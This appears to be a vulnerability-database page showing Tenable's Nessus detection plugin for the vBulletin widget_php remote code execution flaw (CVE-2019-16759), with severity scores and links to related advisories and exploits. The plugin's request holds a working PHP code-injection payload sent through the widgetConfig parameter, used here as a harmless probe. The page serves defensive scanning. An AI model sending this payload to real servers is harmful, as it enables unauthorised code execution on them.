Lucene search
This script is Copyright (C) 2019-2024 and is owned by Tenable, Inc. or an Affiliate thereof.VBULLETIN_WIDGET_PHP_CMD_EXEC.NASLHistoryOct 23, 2019 - 12:00 a.m.
vBulletin 'widget_php' Command Execution
2019-10-2300:00:00
This script is Copyright (C) 2019-2024 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
46
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.9
Confidence
High
EPSS
0.975
Percentile
100.0%
The version of vBulletin running on the remote host is affected by an input-validation flaw in the βwidgetConfigβ parameter to the script βajax/render/widget_phpβ that allows command execution.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(130168);
script_version("1.10");
script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/04");
script_cve_id("CVE-2019-16759");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");
script_name(english:"vBulletin 'widget_php' Command Execution");
script_set_attribute(attribute:"synopsis", value:
"A bulletin board system running on the remote web server has a
command execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of vBulletin running on the remote host is affected by an
input-validation flaw in the 'widgetConfig' parameter to the script
'ajax/render/widget_php' that allows command execution.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2019/Sep/31");
script_set_attribute(attribute:"solution", value:
"Upgrade to vBulletin 5.5.4 P1 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2019-16759");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'vBulletin widgetConfig RCE');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"CANVAS");
script_set_attribute(attribute:"vuln_publication_date", value:"2019/09/23");
script_set_attribute(attribute:"patch_publication_date", value:"2019/09/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2019/10/23");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:vbulletin:vbulletin");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2019-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("vbulletin_detect.nasl");
script_require_keys("www/vBulletin");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
port = get_http_port(default:80);
install = get_kb_item_or_exit('www/'+port+'/vBulletin');
matches = pregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!matches)
audit(AUDIT_WEB_APP_NOT_INST, "vBulletin", port);
dir = matches[2];
if (dir !~ '/$')
dir = dir + '/';
url = dir + 'ajax/render/widget_php';
res = http_send_recv3(
method:'POST',
item:url,
data:'widgetConfig[code]=echo pi();',
add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'),
port:port,
exit_on_fail:TRUE
);
if ("3.14159265358" >!< res[2])
audit(AUDIT_WEB_APP_NOT_AFFECTED, "vBulletin", build_url(port:port,qs:dir));
pi_pos = stridx(res[2], "3.14159265358");
res_proof = substr(res[2], pi_pos - 100, pi_pos + 100);
report = get_vuln_report(
items:http_last_sent_request(),
port:port,
trailer:'\n' +
'The above request resulted in the following output :' +
'\n\n' +
res_proof
);
security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);
Related
threatpost
threatpost
vBulletin Flaw Exploited in Dutch Sex-Work Forum Breach
2019-10-10 20:37:40
Rash of Exploits Targets Critical vBulletin RCE Bug
2019-09-26 17:45:03
Researcher Publishes Patch Bypass for vBulletin 0-Day
2020-08-11 12:09:30
attackerkb
attackerkb
CVE-2019-16759
2019-09-24 00:00:00
CVE-2020-12720 vBulletin incorrect access control
2020-05-08 00:00:00
CVE-2020-17496
2020-08-12 00:00:00
prion
prion
Cross site request forgery (csrf)
2019-09-24 22:15:00
Design/Logic Flaw
2020-08-12 14:15:00
Design/Logic Flaw
2020-10-30 17:15:00
thn
thn
Hackers Breach ZoneAlarm's Forum Site β Outdated vBulletin to Blame
2019-11-11 15:27:00
packetstorm
packetstorm
vBulletin 5.x Pre-Auth Remote Code Execution
2019-09-28 00:00:00
vBulletin 5.x Remote Code Execution
2020-08-11 00:00:00
vBulletin 5.x Remote Code Execution
2020-08-11 00:00:00
exploitdb
exploitdb
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
githubexploit
githubexploit
Exploit for Code Injection in Vbulletin
2020-08-24 16:15:10
Exploit for Code Injection in Vbulletin
2020-02-20 23:14:52
Exploit for Code Injection in Vbulletin
2020-08-31 13:44:15
canvas
canvas
Immunity Canvas: VBULLETIN_WIDGET_RCE
2019-09-24 22:15:00
metasploit
metasploit
vBulletin widgetConfig RCE
2019-10-18 11:51:58
zdt
zdt
vBulletin 5.5.4 Remote Command Execution Exploit #RCE
2019-12-11 00:00:00
vBulletin 5.x - Remote Command Execution Exploit
2019-10-01 00:00:00
cve
cve
impervablog
impervablog
Attackers Are Quick to Exploit vBulletinβs Latest 0-day Remote Code Execution Vulnerability
2019-09-26 13:43:30
CrimeOps of the KashmirBlack Botnet β Part II
2020-10-22 18:55:05
exploitpack
exploitpack
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
cisa_kev
cisa_kev
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
nvd
nvd
openvas
openvas
vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability
2019-09-25 00:00:00
vBulletin 5.x RCE Vulnerability
2020-08-10 00:00:00
cvelist
cvelist
checkpoint_advisories
checkpoint_advisories
vBulletin Forum Remote Code Execution (CVE-2019-16759; CVE-2020-17496)
2019-09-25 00:00:00
nuclei
nuclei
vBulletin 5.5.4 - 5.6.2- Remote Command Execution
2021-02-24 20:00:52
vBulletin 5.0.0-5.5.4 - Remote Command Execution
2020-07-04 15:56:10
nessus
nessus
mssecure
mssecure
Ghost in the shell: Investigating web shell attacks
2020-02-04 17:30:40
qualysblog
qualysblog
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.9
Confidence
High
EPSS
0.975
Percentile
100.0%
Related for VBULLETIN_WIDGET_PHP_CMD_EXEC.NASL